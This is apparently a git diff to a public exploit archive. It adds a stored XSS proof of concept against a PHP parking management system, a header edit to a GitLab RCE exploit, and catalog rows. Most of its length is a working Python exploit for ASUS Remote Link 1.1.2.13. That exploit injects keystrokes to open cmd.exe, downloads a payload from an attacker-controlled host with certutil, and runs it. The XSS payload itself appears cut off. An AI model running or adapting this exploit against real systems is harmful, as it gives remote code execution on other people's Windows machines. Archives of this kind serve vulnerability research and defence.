diff --git a/exploits/php/webapps/49595.txt b/exploits/php/webapps/49595.txt
new file mode 100644
index 000000000..c9721eb31
--- /dev/null
+++ b/exploits/php/webapps/49595.txt
@@ -0,0 +1,38 @@
+# Exploit Title: Vehicle Parking Management System 1.0 - 'catename' Persistent Cross-Site Scripting (XSS)
+# Date: 2021-02-25
+# Exploit Author: Tushar Vaidya
+# Vendor Homepage: https://www.sourcecodester.com/php/14415/vehicle-parking-management-system-project-phpmysql-full-source-code.html
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/mayuri_k/lagos-parker-fullsource-code.zip
+# Version: v1.0
+# Tested on: Ubuntu
+
+
+*Steps to Reproduce:*
+1) Login with Admin Credentials and click on the '*Manage category*' button.
+2) Click on the '*Add Categories*' button.
+3) Now add the 'Ba1man' in the input field of '*Category*' and intercept it with Burp Suite.
+4) Now add the following payload input field of *Category *as a parameter name is *catename*
+
+Payload: ba1man">
+
+4) Click On Save
+5) Now go to '*Manage category > View Categories*'
+5) XSS payload is triggered.
+
+*proof-of-concept:*
+1) Request:
+
+POST /lagos_parker/parker/addcategory.php HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101
+Firefox/68.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://localhost/lagos_parker/parker/addcategory.php
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 82
+Connection: close
+Cookie: PHPSESSID=6432hpio6v07igni4akosvdbmn
+Upgrade-Insecure-Requests: 1
+catename=ba1man">&submit=
\ No newline at end of file
diff --git a/exploits/ruby/webapps/49334.py b/exploits/ruby/webapps/49334.py
index f0e29ed1b..31345e155 100755
--- a/exploits/ruby/webapps/49334.py
+++ b/exploits/ruby/webapps/49334.py
@@ -1,7 +1,8 @@
# Exploit Title: GitLab 11.4.7 RCE (POC)
# Date: 24th December 2020
# Exploit Author: Norbert Hofmann
-# Original Exploit Authors: Sam Redmond, Tam Lai Yin
+# Exploit Modifications: Sam Redmond, Tam Lai Yin
+# Original Author: Mohin Paramasivam
# Software Link: https://gitlab.com/
# Environment: GitLab 11.4.7, community edition
# CVE: CVE-2018-19571 + CVE-2018-19585
diff --git a/exploits/windows/remote/49594.py b/exploits/windows/remote/49594.py
new file mode 100755
index 000000000..9f3ee4999
--- /dev/null
+++ b/exploits/windows/remote/49594.py
@@ -0,0 +1,162 @@
+# Exploit: ASUS Remote Link 1.1.2.13 - Remote Code Execution
+# Date: 24-02-2021
+# Exploit Author: H4rk3nz0
+# Vendor Homepage: http://asus.com/
+# Software Link: http://remotelink.asus.com/
+# Version: 1.1.2.13
+# Tested on: Windows 10 Enterprise Build 17763
+# CVE: N/A
+
+#!/usr/bin/python
+
+import socket
+from time import sleep
+import sys
+
+
+port = 5665
+target = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+
+prefix = "04020b02"
+suffix = "0000020000000000000000000300000000000000000004000000000000000000010000"
+enter = (prefix + ("0" * 1038)).decode("hex")
+string_prefix = "04020b0200000000010000"
+string_suffix = "0" * 1022
+pre_command = "04000b0200000000".decode("hex")
+user_declare = ("02028a0000000000000057696e646f777320446566656e646572" + "0" * 224).decode("hex") # Declares Connection Source as 'Windows Defender'
+
+# ASCII to Hex Character List
+characters={
+ "A":"41","B":"42","C":"43","D":"44","E":"45","F":"46","G":"47","H":"48","I":"49","J":"4a","K":"4b","L":"4c","M":"4d","N":"4e",
+ "O":"4f","P":"50","Q":"51","R":"52","S":"53","T":"54","U":"55","V":"56","W":"57","X":"58","Y":"59","Z":"5a",
+ "a":"61","b":"62","c":"63","d":"64","e":"65","f":"66","g":"67","h":"68","i":"69","j":"6a","k":"6b","l":"6c","m":"6d","n":"6e",
+ "o":"6f","p":"70","q":"71","r":"72","s":"73","t":"74","u":"75","v":"76","w":"77","x":"78","y":"79","z":"7a",
+ "1":"31","2":"32","3":"33","4":"34","5":"35","6":"36","7":"37","8":"38","9":"39","0":"30",
+ " ":"20","+":"2b","=":"3d","/":"2f","_":"5f","<":"3c",
+ ">":"3e","[":"5b","]":"5d","!":"21","@":"40","#":"23","$":"24","%":"25","^":"5e","&":"26","*":"2a",
+ "(":"28",")":"29","-":"2d","'":"27",'"':"22",":":"3a",";":"3b","?":"3f","`":"60","~":"7e",
+ "\\":"5c","|":"7c","{":"7b","}":"7d",",":"2c",".":"2e"}
+
+
+# User Specified arguments
+try:
+ rhost = "192.168.1.93"
+ lhost = sys.argv[2]
+ payload = sys.argv[3]
+except:
+ print("Usage: python " + sys.argv[0] + " ")
+ exit()
+
+# HandShake Packets to Smart Gesture Server
+def Handshake():
+ target.connect((rhost,port))
+ target.sendto("b2".decode("hex"),(rhost,port))
+ target.sendto("38323538".decode("hex"),(rhost,port))
+ target.sendto("03000f0000000000".decode("hex"),(rhost,port))
+ target.sendto("03020f000000000003310000000000".decode("hex"),(rhost,port))
+ target.sendto("02008a0000000000".decode("hex"),(rhost,port))
+ target.sendto(user_declare,(rhost,port))
+ sleep(0.1)
+
+
+def MoveMouse():
+ for i in range(0,16):
+ target.sendto("0000330038040006".decode("hex"),(rhost,port))
+ target.sendto(("00013300380400060101db010000c502" + suffix).decode("hex"),(rhost,port))
+ target.sendto(("00013300380400060101d0010000ca02" + suffix).decode("hex"),(rhost,port))
+ target.sendto(("00013300380400060101c7010000ce02" + suffix).decode("hex"),(rhost,port))
+ target.sendto(("00013300380400060101bd010000d202" + suffix).decode("hex"),(rhost,port))
+ target.sendto(("00013300380400060101b2010000d502" + suffix).decode("hex"),(rhost,port))
+ target.sendto(("00013300380400060101a6010000d802" + suffix).decode("hex"),(rhost,port))
+ target.sendto(("0001330038040006010199010000db02" + suffix).decode("hex"),(rhost,port))
+ target.sendto(("000133003804000601018d010000de02" + suffix).decode("hex"),(rhost,port))
+ target.sendto(("0001330038040006010180010000e002" + suffix).decode("hex"),(rhost,port))
+ target.sendto(("0001330038040006010171010000e402" + suffix).decode("hex"),(rhost,port))
+ target.sendto(("0001330038040006010163010000e602" + suffix).decode("hex"),(rhost,port))
+ target.sendto(("0001330038040006010154010000e902" + suffix).decode("hex"),(rhost,port))
+ target.sendto(("0001330038040006010146010000eb02" + suffix).decode("hex"),(rhost,port))
+ target.sendto(("000133003804000601013b010000ed02" + suffix).decode("hex"),(rhost,port))
+ target.sendto(("000133003804000601012d010000f002" + suffix).decode("hex"),(rhost,port))
+ target.sendto(("0001330038040006010120010000f302" + suffix).decode("hex"),(rhost,port))
+ target.sendto(("0001330038040006010113010000f702" + suffix).decode("hex"),(rhost,port))
+ target.sendto(("0001330038040006010107010000fa02" + suffix).decode("hex"),(rhost,port))
+ target.sendto(("00013300380400060101fa000000fd02" + suffix).decode("hex"),(rhost,port))
+ target.sendto(("00013300380400060101f10000000003" + suffix).decode("hex"),(rhost,port))
+ target.sendto(("00013300380400060101e50000000303" + suffix).decode("hex"),(rhost,port))
+ target.sendto(("00013300380400060101d90000000603" + suffix).decode("hex"),(rhost,port))
+ target.sendto(("00013300380400060101ce0000000903" + suffix).decode("hex"),(rhost,port))
+ target.sendto(("00013300380400060101c20000000d03" + suffix).decode("hex"),(rhost,port))
+ target.sendto(("00013300380400060101b60000001103" + suffix).decode("hex"),(rhost,port))
+ target.sendto(("00013300380400060101ab0000001403" + suffix).decode("hex"),(rhost,port))
+ target.sendto(("00013300380400060101a00000001803" + suffix).decode("hex"),(rhost,port))
+ target.sendto(("00013300380400060101950000001c03" + suffix).decode("hex"),(rhost,port))
+ target.sendto(("00013300380400060101890000002003" + suffix).decode("hex"),(rhost,port))
+ target.sendto(("000133003804000601017e0000002403" + suffix).decode("hex"),(rhost,port))
+ target.sendto(("00013300380400060101740000002703" + suffix).decode("hex"),(rhost,port))
+ target.sendto(("000133003804000601016c0000002a03" + suffix).decode("hex"),(rhost,port))
+ target.sendto(("00013300380400060101650000002c03" + suffix).decode("hex"),(rhost,port))
+ target.sendto(("000133003804000601015c0000002f03" + suffix).decode("hex"),(rhost,port))
+ target.sendto(("000133003804000601015c0000003003" + suffix).decode("hex"),(rhost,port))
+ target.sendto(("000233003804000601005c0000003003" + suffix).decode("hex"),(rhost,port))
+ sleep(0.6)
+
+# Sends Left Click Input (Occasional Delay for some Reason)
+def LeftClick():
+ target.sendto("0000330038040006".decode("hex"),(rhost,port))
+ target.sendto(("0001330038040006010116020000e502" + suffix).decode("hex"),(rhost,port))
+ target.sendto(("0001330038040006010116020000e502" + suffix).decode("hex"),(rhost,port))
+ target.sendto(("0001330038040006010116020000e502" + suffix).decode("hex"),(rhost,port))
+ target.sendto(("0001330038040006010116020000e502" + suffix).decode("hex"),(rhost,port))
+ target.sendto(("0001330038040006010116020000e502" + suffix).decode("hex"),(rhost,port))
+ target.sendto(("0001330038040006010116020000e502" + suffix).decode("hex"),(rhost,port))
+ target.sendto(("0001330038040006010116020000e502" + suffix).decode("hex"),(rhost,port))
+ target.sendto(("0001330038040006010116020000e502" + suffix).decode("hex"),(rhost,port))
+ target.sendto(("0002330038040006010016020000e502" + suffix).decode("hex"),(rhost,port))
+ sleep(4)
+
+# Send Enter/Return Key Input
+def SendReturn():
+ target.sendto(pre_command,(rhost,port))
+ sleep(0.2)
+ target.sendto(enter,(rhost,port)) # Enter/Return Key
+
+# Send String Characters
+def SendString(string):
+ for char in string:
+ convert = characters[char]
+ final_string = string_prefix + convert + string_suffix
+ target.sendto(pre_command,(rhost,port))
+ target.sendto(final_string.decode("hex"),(rhost,port))
+ sleep(0.2)
+
+# Main Execution
+def main():
+ print("[+] Saying Hello")
+ Handshake()
+ sleep(2)
+ print("[+] Moving Mouse")
+ MoveMouse()
+ print("[+] Left Clicking (takes a few seconds)")
+ LeftClick() # Left Click is delayed sometimes
+ print("[+] Opening CMD")
+ SendString("cmd.exe") # Start Command Prompt
+ sleep(0.5)
+ SendReturn()
+ sleep(1)
+ print("[+] Retrieving Payload")
+ SendString("certutil.exe -f -urlcache http://" + lhost + "/" + payload + " C:\\Windows\Temp\\" + payload) # Retrieve Payload
+ sleep(0.5)
+ SendReturn()
+ sleep(3)
+ print("[+] Executing")
+ SendString("C:\\Windows\\Temp\\" + payload) # Execute Payload
+ sleep(0.5)
+ SendReturn()
+ sleep(0.5)
+ print("[+] Done! Check your listener?")
+ SendReturn() # Trailing Enter Command Ensures full execution
+ target.close()
+ exit()
+
+if __name__=="__main__":
+ main()
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 4564adff9..decfe5cee 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -18388,6 +18388,7 @@ id,file,description,date,author,type,platform,port
49218,exploits/windows/remote/49218.txt,"Huawei HedEx Lite 200R006C00SPC005 - Path Traversal",2020-12-09,Vulnerability-Lab,remote,windows,
49261,exploits/solaris/remote/49261.c,"Solaris SunSSH 11.0 x86 - libpam Remote Root",2020-12-15,"Hacker Fantastic",remote,solaris,
49418,exploits/multiple/remote/49418.py,"Erlang Cookie - Remote Code Execution",2021-01-13,1F98D,remote,multiple,
+49594,exploits/windows/remote/49594.py,"ASUS Remote Link 1.1.2.13 - Remote Code Execution",2021-02-25,H4rk3nz0,remote,windows,
6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -43782,3 +43783,4 @@ id,file,description,date,author,type,platform,port
49570,exploits/php/webapps/49570.txt,"Billing Management System 2.0 - 'email' SQL injection Auth Bypass",2021-02-17,"Pintu Solanki",webapps,php,
49573,exploits/php/webapps/49573.py,"Batflat CMS 1.3.6 - Remote Code Execution (Authenticated)",2021-02-18,mari0x00,webapps,php,
49593,exploits/php/webapps/49593.txt,"LayerBB 1.1.4 - 'search_query' SQL Injection",2021-02-24,"Görkem Haşin",webapps,php,
+49595,exploits/php/webapps/49595.txt,"Vehicle Parking Management System 1.0 - 'catename' Persistent Cross-Site Scripting (XSS)",2021-02-25,"Tushar Vaidya",webapps,php,